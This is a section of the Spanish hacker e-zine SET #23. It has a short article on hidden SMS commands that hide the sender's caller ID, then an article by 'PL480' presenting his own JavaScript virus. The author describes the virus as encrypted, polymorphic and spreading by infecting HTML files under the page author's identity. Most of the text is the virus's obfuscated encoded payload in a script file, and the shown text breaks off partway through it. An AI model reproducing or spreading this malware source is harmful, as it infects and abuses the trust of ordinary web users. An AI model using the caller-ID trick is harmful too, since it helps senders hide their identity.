-[ 0x03 ]-------------------------------------------------------------------- -[ Bazar ]------------------------------------------------------------------- -[ by Varios Autores ]------------------------------------------------SET-23- #$""#. $. ,# :# ##' .,,. ,.###:. ,, '#,:#$#. #$ "#; .# #; ,;#' .# #; :# $. ,# #' '# ,#' #' '# $# ,:###' "#,,$#,. ,#$#;:'` "#,,$#,. ,:' - [ SET #23 ] - Barato, barato, reina. De vuelta con el bazar, lleno de articulos cortos, opiniones personales, trucos variopintos y toda clase de extra~as maravillas. El recuerdo de rigor para los que se saltan el articulo 0x07. - 80 columnas - Temas novedosos, interesantes, originales o al menos coherentes - Sin faltas. Vive el verano. -{ Contenidos del Bazar de SET #23 }- 0x01 - Preprocesado SMS de Movistar < Krip7ik 0x02 - Virus de nuestro tiempo < PL480 0x03 - Kontra el Sistema < _MeNpH_ 0x04 - Movidas en GIMP < TryckY 0x05 - Videoklub: Pasion por el cine < ^pRoviDoR 0x06 - El Arte de la Ingenieria Social II < Tahum 0x07 - Er Pako Underground < SET Staff 0x08 - Ascii rules < RagPutana 0x09 - Como ganar a las siete y media < Hendrix 0x0A - BookMarks < SET Staff -< 0x01 >-------------------------------------------------.-------------.---- `-[ Krip7ik )-ï ________________________________________________ -:=| Comandos de preprocesado en SMS con Vomistar |=:- ------------------------------------------------ By Krip7iK Bien, hace poco me llego un rumor de ciertos comandos para enviar mensajes cortos con acuse de recibo, con ocultacion del numero emisor del mensaje (CID), y ... envio *GRATUITO*... Pues nada me puse a investigarlo y saque lo siguiente en claro: Se trata de insertar una serie de comandos antes del SMS en si (antes del texto); la sintaxis que se usa es la siguiente: *X*X*X*X*# Donde las X son los comandos. Esto es: se abre el dialogo de comandos con un * , luego mediante una letra (en donde esta la X) se especifica el comando en cuestion, si quieres enviar mas de un comando estos van separados por * entre si, y finalmente se cierra el dialogo de comandos con una #. Los comandos que hemos descubierto y comprobado son los siguientes dos: o => Ocultacion de identidad (oculta CID) n => acuse de recibo (te envia un SMS el centro receptor del mensaje, no el terminal receptor, sino el Centro que usa el terminal receptor, diciendo que el mensaje que enviaste a la hora tal del dia cual ha sido recibido por No. a la hora tal del dia cual.) El comando de envio gratuito que llego a mis oidos es con la letra "u", pero por la simple prueba que realice (intento de envio con una SIM sin credito) no debe funcionar, o al menos.. no es la "u" el comando... Lo que no quiere decir que no exista algun comando que lo permita. CONCLUSION: El centro de envio de mensajes tiene en su software algun tipo de preprocesador del SMS que busca una cierta sintaxis de comandos (la ya expuesta) y actua en consecuencia. Ya conocemos dos comandos validos, y nada nos hace pensar que no existan mas, asi que todos aquellos con tiempo, ganas .. y credito suficiente podeis intentar descubrir nuevos comandos. NOTA FINAL: si se abre un dialogo de comandos con * y no se acaba de cerrar con la consiguiente #, el receptor recibe un mensaje totalmente en blanco y habreis perdido esas maravillosas 20 pelas... asi que no os olvideis de la # y no os confundais con los * !!!. -= Todas las pruebas realizadas han sido hechas con tarjetas Movistar Activa (diversos tipos: 4, joven...), no se han realizado pruebas por el momento con Airtel ni con terminales de contrato. Eso si.. se ha probado a enviar a diferentes compa~ias con exito en todas ellas =- -< 0x02 >------------------------------------------.-------------------.----- `-[ PL480 )-ï Como se ha puesto de moda esto de los virus en javascript, pos no iba yo a ser menos, y ahi va eso... prefiero que se publique en SET para que no se me pueda acusar de provocar da~os... Me parece ironico que en la historia de la love letter sea el pobre chaval quien pague por las burradas que permiten hacer los programas de Moco$oft. Los da~os no los provocan los escritores de virus, sino los sistemas que permiten la ejecucion de sus codigos. Confieso que me decidi a terminar el virus tras ver el codigo de love-letter, con la intencion de hacer algo un poco mas limpio (menos virulento y menos destructivo) y evolucionado: por lo menos cifra el codigo, y es primitivamente polimorfico. No he utilizado la "novedosa" teknika del outlook, porque es de esperar que dure poco una funcionalidad que permite el spam... Me parecio mas eficaz una contaminacion lenta mediante archivos htm... Tiene el interes de utilizar la identidad del escritor de la pagina para adquirir la confianza de la victima... PL480. Nada, que ultimamente me ha dao por empaquetar y encapsularlo todo... para evitar "accidentes". Me parecio curioso utilizar los comentarios para insertar codigo, imagenes, troyanos... <++>script/pl480.htm /* Importante: no insertar saltos de linea...*/ function = pl480(){/*BBHBFBCHCCKBCJBCDHBECBBCBBHBJKBCCCBBCCDCDHBECBBCBIHBCCCBBCCBCJG= BDEBCGBJFBGFBEGBGFBBGBJFBJFBJFBDEBDEBIHBFCCCBCBBCGBCHCCGCCJGBDEBBJBHIBDGB= HGBJFBDEBECBBCBBHBDCCFCCCBCDHBECBBCBDEBDEBDEBJHBEIBEJBIHBHIBGHBIIBKHBDJBJ= GBDEBBIBKIBDJBDEBKHBJHBGJBIHBGHBFJBEIBKIBJIBGHBHIBDEBBJBGJBDJBBJBKIBEJBKH= BDEBKIBJIBHIBKJBJGBDEBECBBCBKBBECBBCBDEBJHBKIBJIBKEBFJBDEBDJBGJBJIBDEBFJB= DIBEIBEJBDEBIHBKIBJHBKHBHFBHFBHFBDEBIIBIKBIBCCBCDEBIKBDEBJKBCBCHCCHCCCBCF= CCDEBCCCBCCCBCEEBEEBEEBDEBJGBCFBECBBCBDEBDEBHCCFBCIKBBCCIBCGCCDEBHCCCCCDE= BEJBKHBFJBFFBCIBICCBCCGBCBCCGCCIBCGBCFFBGHBBGBIGBFFBCBCGFBCIBCBCBCCHFBHFB= HFBECBBCBDEBDEBDEBGHBBCCBBCDEBIIBHEBDEBDBCCCCFCCDEBHCCFBCCBCDEBFIBEJBKKBF= CCGBCDCCHCCDEBFEBIJBEJBFBCDEBJCCGBCFCCICCGCCDEBHCCICCHCCCCCFCCGBCIKBJBCFE= BECBBCBDEBDEBDEBHCCFBCIKBHCCDEBKKBCCCKBCCBCGCCDEBKCCGBCHCCFBCDEBIJBEJBFBC= CBCJBCJBCHFBHFBHFBDEBECBBCBKBBJIBCCCKCCDEBIIBHEBIJBGBCBCCBBCCCCKCCGCCDEBG= BCGCCDEBFBCIKBKKBIBCCBCFCCDEBDBCFCCGBCCBCBCCBBCJBCCDCJGBDEBECBBCBKBBIJBFB= CCBCFCCCBCDEBCDCCCCICCDEBKCCIKBBCCHCCDEBHCCCCCDEBCBCBCCHCCCBCFCCDEBHCCCCC= BBCIKBCDCEHBDEBKGBCFBECBBCBKBBDEBDEBECBBCBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBG= FBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGF= BGFBGFBGFBGFBGFBGFBECBBCBDEBDEBDEBJHBCBCGCCKKBFCCGBCDCCKKBGBCCCCBCCJGBECB= BCBECBBCBKHBGCCDEBICCBCCDEBKKBCCCBBCGBCEBCCCCDEBJKBIKBGCCHCCIKBBCCHCCCBCD= EBFCCCBCBBCICCBCCBBCIKBBCCHCCCBCDEBCDCDEBBBCCBCGCCCCCFCCEBCIKBBCCGBCDDCIK= BBBCCCCFFBECBBCBDEBCDCIKBDEBECCICCCBCDEBFBCCBCDEBGBCBBCCCCDEBIKBCFDIKBBBC= GBCCBCBCCBBCCCCJBCCBCDEBDBCICCBCCKKBGBCCCCBCCIKBJBCGBCBBCIKBBBCDEBKBCGBCC= BCBCCHCCFCCIKBGCCDEBECBBCBGBCBCCJCCCBCGCCHCCGBCEBCIKBJKBIKBDEBJBCIKBDEBIK= BCDCICCBBCIKBDEBBBCCBCDEBIIBHEBHFBHFBHFBECBBCBIHBCCCBCCDEBJBCCCCDEBKKBICC= IKBJBCDEBECCICCGBCCBCFCCCCCDEBBBCCBCHBCIKBFCCDEBKKBJBCIKBFCCCCCDEBECCICCC= BCDEBCBCGCCHCCCBCDEBKKBCCCBBCGBCEBCCCCDEBBCCCCCDEBCBCGCCDEBECBBCBCBCHBCCB= CKBCDCCJBCIKBFCCFFBDEBECCICCCBCDEBCBCGCCDEBJKBIKBGCCGBCKKBIKBKBCCBCBCCHCC= CBCDEBICCBCCDEBCBCBCCGCCIKBKBCJKBJBCIKBBBCCCCDEBBBCCBCDEBECBBCBIKBJBCEBCI= CCBCCCCCGCCDEBDBCFCCIKBEBCKBCCBCBCCHCCCCCGCCDEBBBCCBCDEBJBCCCCGCCDEBDBCGB= CKKBFBCCBCFCCCCCGCCDEBBBCCBCDEBIKBCDCICCBBCIKBDEBBFBKEBIJBGCCFBCHFBKKBFBC= KBCKEBDEBCDCECBBCBKEBFIBGCCKKBFCCGBCDCCHCCEGBHFBKKBFBCKBCKEBFFBDEBECCICCC= BCDEBJCCGBCCBCBCCCBCBCCDEBKKBCCCBCCDEBCBCJBCDEBIJBBGBGIBCFBCDCDEBECCICCCB= CDEBFBCIKBDEBGCCGBCBBCCCCECBBCBCBCGCCKKBFCCGBCHCCCCCDEBKKBCCCBCCDEBDBCGBC= BCCCBCGCCDEBCBCBDCKKBICCGCCGBCJCCIKBKBCCBCBCCHCCCBCDEBCBCBBCICCKKBIKBHCCG= BCJCCCCCGCCJGBDEBBHBHHBGJBFJBFJBKIBJIBDEBECBBCBCCCBCCKKBJBCGBCKKBIBCCHBFE= BBBCCCCKKBICCKBCCBCBCCHCCHFBIKBJBCJBCHFBHCCCBCBDCHCCCCCGHBHFBJCCIKBJBCICC= CBCCHBBJBHIBDGBHGBJFBDEBEFBDEBEIBBCCDBCCBCKKBHCCKGBBBCCCCKKBICCKBCCBCBCCH= CCHFBIKBJBCJBCHFBHCCCBCBDCHCCCCCHFBGCCHCCCDCJBCCBCHFBBBCGBCGCCDCCJBCIKBCD= CCHBKEBKEBFEBDHBDEBJCCCBCFCCDEBKKBCCCBBCGBCEBCCCCDEBBHBIFBJKBICCHCCHCCCCC= BCCDHBECBBCBDEBDEBDEBDEBDEBIHBCCCKBCCCCDEBJBCCCCGCCDEBHIBKHBCIBKIBJGBDEBJ= BCCCCDEBBBCGBCJCCCBCFCCHCCGBCBBCCCCDEBCBCGCCDEBCBCBCCGCCIKBKBCJKBJBCIKBFC= CHFBECBBCBECBBCBBHBBBCGBCJCCDEBGBCBBCCHBFEBHCCCBCBDCHCCCCCFEBDEBGCCHCCCDC= JBCCBCCHBFEBBBCGBCGCCDCCJBCIKBCDCJGBKEBBCCCCCBCCCBCKEBFEBDHBECBBCBBHBHCCC= BCBDCHCCIKBFCCCBCIKBDEBBCCIKBKBCCBCCHBFEBHCCCBCBDCHCCCCCGHBFEBDEBFCCCCCKC= CGCCCHBFEBBGBJFBFEBDEBKKBCCCJBCGCCCHBFEBHGBJFBFEBDEBDHBBHBIFBHCCCBCBDCHCC= IKBFCCCBCIKBDHBECBBCBBHBIFBBBCGBCJCCDHBECBBCBDEBEIBBCCDBCCBCKKBHCCIKBDEBJ= BCCCCGCCDEBDBCGBCKKBFBCCBCFCCCCCGCCDEBHFBFBCHCCKBCDEBBBCCBCJBCDEBCBCGCCKK= BFCCGBCHCCCCCFCCGBCCCCDEBBFBCDCDEBGCCICCJKBKKBIKBFCCDCCCBCHCCIKBGCCCFBECB= BCBKKBCCCBCCDEBICCBCCIKBDEBKKBCCCDCCGBCIKBDEBJKBICCFCCBBCIKBKBCCBCBCCHCCC= BCDEBKKBGBCDBCFCCIKBBBCIKBDEBDCCIKBFCCIKBDEBBBCCCCHCCIKBFCCDEBIKBJBCDEBKK= BCCCBBCGBCEBCCCCDEBBBCCBCECBBCBICCBCCDEBDCCCBCICCBBCCCCGFBDCCCCCJBCGBCKBC= CCCFCCDBCGBCGCCKBCCCCHFBECBBCBIHBICCIKBBCCBBCCCCDEBGCCCBCDEBCBCHBCCBCKKBI= CCHCCIKBDEBCBCJBCDEBKKBCCCBBCGBCEBCCCCDEBFBCHCCKBCJBCFFBDEBKBCCCCBBCGBCDB= CGBCKKBIKBDEBCBCJBCDEBFCCCBCEBCGBCGCCHCCFCCCCCECBBCBDCCIKBFCCIKBDEBGCCCBC= FCCDEBGBCBCCGBCKKBGBCIKBBBCCCCDEBIKBJBCDEBIKBFCCFCCIKBBCCECCICCCBCDEBBBCC= BCJBCDEBKCCBGBHFBECBBCBGHBBBCCBCKBCIKBGCCDEBJHBCBCHBCIKBDEBICCBCCIKBDEBFC= CICCHCCGBCBCCIKBDEBFCCCBCGCCGBCBBCCBCBCCHCCCBCDEBFEBICCGCCICCIKBFCCGBCCCC= HFBHBCGCCFEBDEBECCICCCBCECBBCBECCICCCBCDEBJBCIKBBCCDDCIKBDEBCBCGCCDCCCCCF= CCIKBBBCGBCKKBIKBKBCCBCBCCHCCCBCDEBJBCIKBDEBFCCICCHCCGBCBCCIKBDEBBBCCBCDE= BGBCBCCDBCCBCKKBKKBGBCCCCBCCECBBCBCBCBCCDEBICCBCCDEBIKBFCCKKBFBCGBCJCCCCC= DEBHCCCBCKBCDCCCCCFCCIKBJBCHFBHFBHFBECBBCBECBBCBBJBIKBFCCIKBDEBCBCJCCGBCH= CCIKBFCCDEBFCCCBCGBCBCCDBCCBCKKBHCCIKBFCCDEBBGBDEBJCCCBCKKBCBCGCCDEBCBCJB= CDEBKBCGBCGCCKBCCCCDEBDBCGBCKKBFBCCBCFCCCCCFFBECBBCBDBCGBCFCCKBCIKBDEBKKB= CCCBCCDEBCBCJBCDEBBCCCCCKBCJKBFCCCBCDEBBBCCBCDEBICCGCCICCIKBFCCGBCCCCDEBB= BCCBCJBCDEBCCCFCCBBCCBCBCCIKBBBCCCCFCCHFBHFBHFBECBBCBDCCCCCFCCDEBJBCCCCDE= BHCCIKBBCCHCCCCCFFBDEBCBCJBCDEBECCICCCBCDEBCBCHBCCBCKKBICCHCCCBCDEBCBCJBC= DEBJCCGBCFCCICCGCCFFBDEBBBCCBCHBCIKBFCCIKBDEBECBBCBGBCBCCCBCJCCGBCHCCIKBJ= KBJBCCBCKBCCBCBCCHCCCBCDEBGCCICCDEBFBCICCCBCJBCJBCIKBDEBCBCBCCDEBCBCJBCDE= BKKBCCCBBCGBCEBCCCCHFBHFBHFBECBBCBGHBBBCCBCKBCIKBGCCDEBDCCCCCGCCGBCJKBGBC= JBCGBCHCCIKBDEBJBCIKBDEBGBCBCCDBCCBCKKBKKBGBCCCCBCCDEBDCCCCCFCCDEBJCCIKBF= CCGBCIKBGCCDEBJCCIKBFCCGBCIKBBCCHCCCBCGCCECBBCBGCCGBCKBCICCJBCHCCIKBBCCCB= CIKBKBCCBCBCCHCCCBCHFBHFBHFBDEBECBBCBECBBCBDIBCBCDEBGBCBCCHCCCBCBCCHCCIKB= BBCCCCDEBFBCIKBKKBCBCFCCDEBICCBCCDEBKKBCCCBBCGBCEBCCCCDEBJBCCCCDEBKBCCBCB= CCCCCGCCDEBBBCIKBCFDGBCBCCCCCDEBDCCCCCGCCGBCJKBJBCCBCFFBDEBCDCIKBECBBCBEC= CICCCBCDEBBCCCCCDEBDCCFCCCCCJCCCCCKKBIKBDEBBBCIKBCFDCCCGCCDEBGBCFCCFCCCBC= DCCIKBFCCIKBJKBJBCCBCGCCJGBECBBCBDEBJKBIKBGCCHCCIKBDEBKKBCCCBCCDEBJKBCCCF= CCFCCIKBFCCDEBJBCIKBDEBKKBJBCIKBJCCCBCDEBCBCBCCDEBDJBICCBCCKIBBCCKKBCBCKH= BBDCDEBCDCDEBCBCJBCECBBCBDEBDBCGBCKKBFBCCBCFCCCCCDEBKKBCCCFCCFCCCBCGCCDCC= CCCBCCBBCGBCCBCBCCHCCCBCJGBDEBFEBBCCCCCKBCJKBFCCCBCDEBBBCCBCDEBICCGCCICCI= KBFCCGBCCCCHFBHBCGCCFEBFFBECBBCBDEBIKBBBCCBCKBCIKBGCCDEBBBCCBCDEBJBCGBCKB= CDCCGBCIKBFCCDEBHCCCCCBBCCCCGCCDEBJBCCCCGCCDEBIKBFCCKKBFBCGBCJCCCCCGCCDEB= FBCHCCKBCDEBBBCCBCJBCECBBCBDEBCBCGCCKKBFCCGBCHCCCCCFCCGBCCCCHFBHFBHFBECBB= CBECBBCBDEBDEBGCCGBCDEBBBCCBCDEBHCCCCCBBCIKBGCCDEBDBCCCCFCCKBCIKBGCCDEBKK= BFCCCBCCBCGCCDEBCBCBCCDEBJBCIKBDEBBCCCBCKKBCBCGCCGBCBBCIKBBBCECBBCBDEBDEB= BBCCBCDEBDBCCCCKBCCBCBCCHCCIKBFCCDEBJBCIKBDEBJKBGBCCCCBBCGBCJCCCBCFCCGCCG= BCBBCIKBBBCHFBHFBHFBDEBBHBJKBICCHCCHCCCCCBCCDEBCCCBCCKKBJBCGBCKKBIBCCHBFE= BBJBHIBDGBHGBJFBBFBCFBFEBDHBGFBGFBGFBDEBBJBHIBDGBHGBJFBDEBGFBGFBGFBBHBIFB= JKBICCHCCHCCCCCBCCDHBECBBCBECBBCBBHBIFBDCCFCCCBCDHBECBBCBECBBCBBHBIFBJKBC= CCBBCCDCDHBECBBCBBHBIFBFBCHCCKBCJBCDHBECBBCBECBBCBECBBCBECBBCBECBBCBECBBC= BECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCB= ECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBBHBEJBI= HBDJBEIBBJBFJBDHBECBBCBDBCICCBCCKKBHCCGBCCCCBCCDEBBJBHIBDGBHGBJFBBFBCFBED= CECBBCBECBBCBIFBDFBDEBIHBCCCBBCCBCJGBDEBCGBJFBGFBEGBGFBBGBJFBJFBJFBDEBDEB= IHBFCCCBCBBCGBCHCCGCCJGBDEBBJBHIBDGBHGBJFBDEBECBBCBDEBJHBKIBJIBKEBFJBDEBD= JBGJBJIBDEBFJBDIBEIBEJBDEBIHBKIBJHBKHBHFBHFBHFBDEBIIBIKBIBCCBCDEBIKBDEBJK= BCBCHCCHCCCBCFCCDEBCCCBCCCBCEEBEEBEEBDEBJGBCFBECBBCBDFBIFBECBBCBJCCIKBFCC= DEBFJBCBCKBCDCCCCCFCCIKBFCCCDCBIBCCCJBCBBCCBCFCCCHBBGBKGBECBBCBJCCIKBFCCD= EBCCCJKBHBCJIBCBCHCCDEBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCB= CKKBHCCBFBFEBIJBEJBKKBFCCGBCDCCHCCHFBJIBCBCHCCKCCCCCFCCIBCFEBCFBECBBCBJCC= IKBFCCDEBKKBFCCCDCDEBCHBDEBBCCCBCKCCDEBEJBHCCFCCGBCBCCEBCBFBDEBEIBBCCDBCC= BCKKBHCCDEBEFBDEBBJBHIBDGBHGBJFBDEBEFBDEBFEBBJBHIBDGBHGBJFBBFBCFBKGBFEBCF= BKGBECBBCBJCCIKBFCCDEBFCCBCCBBCDEBCHBDEBIIBIKBHCCFBCHFBFCCCCCICCBCCBBCBFB= IIBIKBHCCFBCHFBFCCIKBBCCBBCCCCKBCBFBCFBDEBDFBDEBKFBJFBJFBJFBCFBKGBECBBCBJ= CCIKBFCCDEBIBCDEBCHBIIBIKBHCCFBCHFBFCCCCCICCBCCBBCBFBIIBIKBHCCFBCHFBFCCIK= BBCCBBCCCCKBCBFBCFBDEBDFBDEBBGBJFBCFBDEBEFBDEBFGBEGBKGBECBBCBJCCIKBFCCDEB= BCCDEBCHBDEBEJBHCCFCCGBCBCCEBCHFBDBCFCCCCCKBCIHBFBCIKBFCCIHBCCCBBCCBCBFBI= BCFFBIBCDEBEFBDEBKFBFFBIBCDEBEFBDEBBGBFFBIBCEFBCGBFFBIBCEFBDGBCFBKGBECBBC= BECBBCBDEBJCCIKBFCCDEBDCCCCCJBCCDCDEBCHBBCCCBCKCCDEBEJBHCCFCCGBCBCCEBCBFB= FEBDBCICCBCCKKBHCCGBCCCCBCCDEBBJBFEBDEBEFBDEBFCCBCCBBCDEBEFBDEBFEBBFBCFBE= DCJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBJFBCFBDEBEFBFEBCHBFEBDE= BEFBDEBIBCDEBEFBFEBKGBFEBCFBKGBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBDEBFEBJCCIKB= FCCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBDEBCHBDEBBCCCBCK= CCDEBGHBFCCFCCIKBCDCBFBFEBKGBECBBCBDEBDBCCCCFCCDEBBFBJCCIKBFCCDEBGBCCHBJF= BKGBGBCBHBKKBFCCCDCHFBJBCCBCBCCEBCHCCFBCDEBGFBDEBKFBKGBGBCEFBEFBCFBEDCDEB= DCCCCCJBCCDCDEBEFBCHBDEBBFBKKBFCCCDCHFBKKBFBCIKBFCCIHBCCCBBCCBCGHBHCCBFBG= BCCFBDEBEFBDEBIBCCFBDEBEFBDEBFEBFFBFEBKGBGDCDEBDEBECBBCBDEBDCCCCCJBCCDCDE= BEFBCHBBFBKKBFCCCDCHFBKKBFBCIKBFCCIHBCCCBBCCBCGHBHCCBFBGBCCFBDEBEFBDEBIBC= CFBEFBFEBCFBKGBFEBKGBECBBCBECBBCBKKBFCCCDCDEBCHBDEBFEBDBCGCCCCCDEBCHBDEBB= CCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBKEBEJBKKBFCCGBCDCCHC= CGBCBCCEBCHFBBIBGBCJBCCBCEJBCDCGCCHCCCBCKBCKIBJKBHBCCBCKKBHCCKEBCFBKGBFEB= ECBBCBKKBFCCCDCDEBEFBCHBDEBFEBGBCDBCDEBBFBDBCGCCCCCEEBCHBBCCICCJBCJBCCFBE= DCFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBJCCIKBFCCDEBGCCCDCGCCDEBCHBDEBDBCGC= CCCCHFBCIBCBCHCCBIBCCCJBCBBCCBCFCCBFBDBCGCCCCCHFBCIBCBCHCCEJBDCCCBCKKBGBC= IKBJBCBIBCCCJBCBBCCBCFCCBFBJFBCFBCFBKGBFEBKGBECBBCBECBBCBKKBFCCCDCDEBEFBC= HBDEBFEBGBCDBCDEBBFBEEBDBCGCCCCCHFBBIBGBCJBCCBCKHBBDCGBCGCCHCCGCCBFBKEBFE= BEFBDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBFEBHFBHBCGCCKEB= CFBCFBEDCFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBKEBJCCIKBFCCDEBDBCCHBDBCGCCCCCH= FBKIBDCCCBCBCCFJBCBCBDCHCCBIBGBCJBCCBCBFBGCCCDCGCCDEBEFBDEBFEBIFBIFBKEBEF= BDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBKEBHFBHBCGCCFEBDEB= FFBBGBFFBHCCFCCICCCBCCFBKGBKEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBF= CCGBCHCCCBCBFBKEBDBCICCBCCKKBHCCGBCCCCBCCDEBBJBFEBDEBEFBDEBFCCBCCBBCDEBEF= BDEBFEBBFBCFBEDCJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBJFBCFBDEB= EFBFEBCHBFEBDEBEFBDEBIBCDEBEFBFEBKGBJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCIKBF= CCGHBHCCBFBKFBCFBDEBEFBFEBDEBCHBDEBBCCCBCKCCDEBGHBFCCFCCIKBCDCBFBKEBCFBKG= BFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCCCCFCCDEBBFBJCCIKBFCCDEBFEBEFBDEB= BCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBCHBJFBKGBFEBEFBDEBBCCHFBKKBFBCI= KBFCCGHBHCCBFBCGBCFBDEBEFBFEBBHBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCF= BDEBEFBFEBHFBJBCCBCBCCEBCHCCFBCDEBGFBKFBKGBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHB= HCCBFBCGBCFBDEBEFBFEBEFBEFBCFBEDCDEBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBD= BCHFBIJBFCCGBCHCCCBCBFBFEBEFBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBCK= BFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBEKBEFBKEBFFBDEBKEBCFB= GDCKGBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBFEBEFBB= CCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBCKBFEBEFBDEBBCCHFBKKBFBCIKBFCCGH= BHCCBFBCGBCFBDEBEFBFEBEKBEFBDEBKEBCFBKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEB= EFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCI= KBFCCGHBHCCBFBBGBCFBDEBEFBFEBCHBDKBFEBDKBFEBKGBDBCCCCFCCDEBBFBJCCIKBFCCDE= BFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBCHBJFBKGBFEBEFBDEBBCC= HFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBBHBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBH= CCBFBKFBCFBDEBEFBFEBHFBJBCCBCBCCEBCHCCFBCKGBFEBEFBDEBBCCHFBKKBFBCIKBFCCGH= BHCCBFBCGBCFBDEBEFBFEBEFBEFBCFBEDCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFB= BGBCFBDEBEFBFEBDEBEFBCHBDEBEJBHCCFCCGBCBCCEBCHFBDBCFCCCCCKBCIHBFBCIKBFCCI= HBCCCBBCCBCBFBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBCKBFEBEF= BDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBEKBGFBFEBEFBDEBBCCHFBKKBFBC= IKBFCCGHBHCCBFBJFBCFBDEBEFBFEBCFBGDCKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBE= FBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBDBCGCCCCCDEBCHBDEBBCCCB= CKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBDKBFEBEJBKKBFCCGBCDCCHCC= GBCBCCEBCHFBBIBGBCJBCCBCEJBCDCGCCHCCCBCKBCKIBJKBHBCCBCKKBHCCDKBFEBCFBKGBJ= CCIKBFCCDEBHCCDBCCCCJBCBBCCBCFCCDEBCHBDEBDBCGCCCCCHFBCIBCBCHCCEJBDCCCBCKK= BGBCIKBJBCBIBCCCJBCBBCCBCFCCBFBBGBCFBKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEB= EFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBHCCBCCIKBKBCCBCDEBCHBD= EBDBCGCCCCCHFBCIBCBCHCCFJBCBCKBCDCCJIBIKBKBCCBCBFBCFBKGBKEBCFBKGBFEBKGBEC= BBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBHCCDBC= GBCJBCCBCDEBCHBDEBHCCDBCCCCJBCBBCCBCFCCHFBIHBFCCCBCIKBHCCCBCFJBCBCBDCHCCB= IBGBCJBCCBCBFBHCCBCCIKBKBCCBCDEBEFBDKBFEBHFBHBCGCCDKBFEBCFBKGBKEBCFBKGBFE= BKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBHCCDBCGBCJBC= CBCHFBIJBFCCGBCHCCCBCBFBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBBGBCFBDEBEFBF= EBCFBKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCB= CBFBKEBHCCDBCGBCJBCCBCHFBIHBJBCCCCGCCCBCBFBCFBKGBKEBCFBKGBFEBKGBECBBCBKKB= FCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBDKBFEBJCCIKBFCCDEBIJBGCCFBCD= EBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBKEBIJBEJBKK= BFCCGBCDCCHCCHFBEJBFBCCBCJBCJBCKEBCFBKGBDKBFEBCFBKGBFEBKGBECBBCBKKBFCCCDC= DEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBIJBGCCFBCHFBDJBICCBCCBFBHCCDBCC= CCJBCBBCCBCFCCDEBEFBDEBDKBFEBIFBIFBDKBFEBDEBEFBHCCBCCIKBKBCCBCEFBDKBFEBHF= BHBCGCCDKBFEBFFBHGBFFBHCCFCCICCCBCCFBKGBDBCGCCCCCHFBJHBCBCJBCCBCHCCCBCBIB= GBCJBCCBCBFBHCCDBCCCCJBCBBCCBCFCCDEBEFBDEBDKBFEBIFBIFBDKBFEBDEBEFBHCCBCCI= KBKBCCBCEFBDKBFEBHFBHBCGCCDKBFEBCFBKGBBJBFEBEFBDEBFCCBCCBBCDEBEFBFEBBFBCF= BKGBGDCDEBBJBFEBEFBDEBFCCBCCBBCDEBEFBFEBBFBCFBKGBKEBCFBKGBFEBKGBECBBCBKKB= FCCCDCDEBEFBCHBDEBFEBDBCHFBIHBJBCCCCGCCCBCBFBCFBKGBFEBKGBECBBCBKKBFCCCDCD= 